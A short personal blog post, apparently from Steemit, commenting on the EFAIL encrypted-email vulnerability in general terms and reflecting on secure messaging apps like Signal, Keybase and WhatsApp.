Stories are flying around this week about a vulnerability in encrypted email. It's always a good idea to check what Bruce Schneier has to say about any security issues. It seems this is an issue with how many email apps render the email after decryption. If an attacker can manipulate it in transit they can add html that effectively sends the plaintext back to them. The sender cannot prevent this. You can't rely on every recipient doing their decryption on a command line.
Every security risk needs a name these days and this one is christened EFAIL. Initial reports from the EFF were a little shrill, but they have a better piece now.
This is not an issue with the PGP/GPG encryption as the attacker still needs you to decrypt the message. I just wonder how many people used encrypted email anyway. I tried to use it years ago, but didn't know many people who were interested.
EFF and others are recommending we use apps like Signal that do end to end encryption. I've not used that yet. I do use Keybase and have linked up with a few Steemians on there. Some of these apps are fairly technical and you have to be aware of what actions can put your security at risk. For most things like WhatsApp may be secure enough.
I do wonder how much younger people use email. You need an account to register for most things, but then they may just use social apps. The problem is the fragmentation of communications. I'm not always sure what app to use to reach certain people.
No system is 100% secure. There's always human error.
Don't have nightmares.
I'll buy guitar picks for Steem Dollars
Get some passive income with Mannabase
If this post is over seven days old you can vote up one of my newer posts to reward me.
Spam comments may be flagged. Beware of the Commentphant!